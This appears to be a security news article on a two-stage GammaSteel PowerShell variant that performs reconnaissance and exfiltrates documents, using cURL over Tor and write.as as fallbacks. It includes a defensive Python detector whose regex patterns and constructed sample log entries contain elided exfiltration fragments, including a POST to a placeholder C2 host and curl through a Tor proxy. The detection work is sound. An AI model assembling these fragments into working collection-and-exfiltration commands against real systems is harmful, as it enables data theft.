Cybersecurity researchers have uncovered a recent cyber attack that uses a new variant of the GammaSteel malware. The new variant is a two-stage attack built on PowerShell scripts: one script collects sensitive information from compromised computers, and the other exfiltrates specific files.
The first script identified in this attack acts as a reconnaissance tool, gathering various data about the infected computer: system specifications, the name of any security software present on the system, available disk space, the directory tree of the Desktop folder, and a list of all currently running processes. Once collected, this information is sent to a command and control (C2) server operated by the attackers.
The second script discovered in this attack is a PowerShell version of the GammaSteel malware. This script is tasked with exfiltrating files with specific extensions from targeted directories on the compromised system. The extensions targeted by this script include .doc, .docx, .xls, .xlsx, .ppt, .pptx, .vsd, .vsdx, .rtf, .odt, .txt, and .pdf. By exfiltrating files with these extensions, the attackers may be able to obtain sensitive information stored on the infected computer.
What sets this new variant of GammaSteel apart is its use of PowerShell web requests to exfiltrate files. If that method fails, the malware falls back to the cURL command-line tool, routed through a Tor proxy, to send the stolen data out. Researchers have also identified code within the malware that suggests the web service ‘write.as’ serves as a further fallback data exfiltration channel.
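As an added illustration of how a defender might hunt for the two-stage behaviour described above (this is example code, not code from the article, the researchers, or the malware itself), the following Python script scores constructed PowerShell Script Block Logging (Event ID 4104) fragments against indicators drawn from the description: the security-software, disk-space, Desktop-tree and process-list reconnaissance, enumeration of the listed document extensions, PowerShell web upload calls, cURL through a local Tor SOCKS proxy, and a reference to write.as. The indicator weights, the alert threshold, the `127.0.0.1:9050` proxy address and the three sample log entries are all assumptions constructed for this example; the page does not give the malware's actual proxy settings or script text.

```python
"""Score PowerShell Script Block Logging (Event ID 4104) entries for the
GammaSteel-style reconnaissance and document-exfiltration behaviour described
in the article. Added example; weights, threshold and samples are assumptions."""
import re
from dataclasses import dataclass, field

# Document extensions the article says the second-stage script targets.
TARGET_EXTENSIONS = {"doc", "docx", "xls", "xlsx", "ppt", "pptx", "vsd", "vsdx",
                     "rtf", "odt", "txt", "pdf"}

# (indicator name, weight, pattern). Weights are assumed for this example:
# channel indicators weigh more because plain inventory scripts rarely use them.
INDICATORS = [
    ("recon_security_software", 2, re.compile(r"AntiVirusProduct|SecurityCenter2", re.I)),
    ("recon_disk_space", 1, re.compile(r"Win32_LogicalDisk|FreeSpace", re.I)),
    ("recon_desktop_tree", 1, re.compile(r"Desktop.*-Recurse|tree\s+.*Desktop", re.I)),
    ("recon_process_list", 1, re.compile(r"Get-Process|Win32_Process", re.I)),
    ("http_upload", 2, re.compile(
        r"Invoke-WebRequest|Invoke-RestMethod|Net\.WebClient|UploadFile|UploadData", re.I)),
    # Assumed Tor SOCKS port (Tor's default is 9050); the article gives no port.
    ("curl_tor_proxy", 3, re.compile(
        r"curl(\.exe)?\b.*(--proxy|-x)\s+socks5h?://(127\.0\.0\.1|localhost):9050", re.I)),
    ("write_as_fallback", 3, re.compile(r"write\.as", re.I)),
]
DOCUMENT_COLLECTION_WEIGHT = 4   # assumed: enumerating 3+ target types
ALERT_THRESHOLD = 6              # assumed: recon alone (max 5) stays below it


@dataclass
class Finding:
    record_id: str
    score: int = 0
    hits: list = field(default_factory=list)
    extensions: set = field(default_factory=set)


def document_extensions(script: str) -> set:
    """Return targeted document extensions referenced in the script text
    (e.g. '*.docx' inside a -Include list). Non-target extensions are dropped."""
    found = {m.group(1).lower() for m in re.finditer(r"\*?\.([a-z]{3,4})\b", script, re.I)}
    return found & TARGET_EXTENSIONS


def analyze(record_id: str, script: str) -> Finding:
    """Match every indicator against one script block and accumulate a score."""
    f = Finding(record_id)
    for name, weight, rx in INDICATORS:
        if rx.search(script):
            f.hits.append(name)
            f.score += weight
    f.extensions = document_extensions(script)
    # Enumerating several of the targeted document types is itself treated as a
    # collection stage, independent of which exfiltration channel follows.
    if len(f.extensions) >= 3:
        f.hits.append("document_collection")
        f.score += DOCUMENT_COLLECTION_WEIGHT
    return f


def is_suspicious(f: Finding, threshold: int = ALERT_THRESHOLD) -> bool:
    """Recon plus an upload channel, or collection plus any channel, trips the alert."""
    return f.score >= threshold


def triage(events: dict) -> dict:
    """Analyze a mapping of record id -> script block text."""
    return {rid: analyze(rid, text) for rid, text in events.items()}


# Constructed, deliberately elided sample entries (not real captures). Hosts are
# placeholders; '...' marks where the remainder of a block was cut.
SAMPLE_EVENTS = {
    # Benign admin inventory: disk and process enumeration only.
    "evt-1-inventory": "Get-CimInstance Win32_LogicalDisk | Select-Object DeviceID,FreeSpace; "
                       "Get-Process | Sort-Object CPU -Descending | Select-Object -First 10",
    # Stage one as described: AV name, disk space, Desktop tree, processes, POST to C2.
    "evt-2-recon": "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct ... "
                   "Get-CimInstance Win32_LogicalDisk ... Get-ChildItem $env:USERPROFILE\\Desktop -Recurse ... "
                   "Get-Process ... Invoke-WebRequest -Uri http://c2-placeholder.invalid/ -Method Post ...",
    # Stage two as described: document enumeration, web upload, cURL/Tor and write.as fallbacks.
    "evt-3-collect": "Get-ChildItem -Path $env:USERPROFILE -Recurse -Include *.doc,*.docx,*.xls,*.xlsx,*.pdf ... "
                     "Invoke-RestMethod -Method Post ... curl.exe --proxy socks5h://127.0.0.1:9050 ... 'write.as' ...",
}

if __name__ == "__main__":
    for rid, f in triage(SAMPLE_EVENTS).items():
        flag = "SUSPICIOUS" if is_suspicious(f) else "ok"
        print(f"{rid}: score={f.score} {flag} hits={f.hits} exts={sorted(f.extensions)}")
```

On the constructed samples the inventory script scores 2 and stays quiet, the reconnaissance block scores 7 (every recon indicator plus the web POST), and the collection block scores 12 because the document enumeration, the PowerShell upload and both fallback channels all match. The scoring is deliberately additive so that a single `Invoke-WebRequest` or `Get-Process`, both common in legitimate administration, never alerts on its own; only the combination the article describes does.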
This two-stage attack highlights the evolving tactics cybercriminals use to steal sensitive information from unsuspecting victims. Because PowerShell and cURL are legitimate tools already present on many systems, their use lets attackers bypass security measures, blend in with normal activity, and exfiltrate data covertly, posing a significant threat to individuals and organizations alike.
It is essential for individuals and businesses to remain vigilant against such threats by implementing robust cybersecurity measures, including keeping security software up to date, running system scans regularly, and practicing good security hygiene. By staying informed and proactive, users can better protect themselves against emerging threats like the new GammaSteel variant.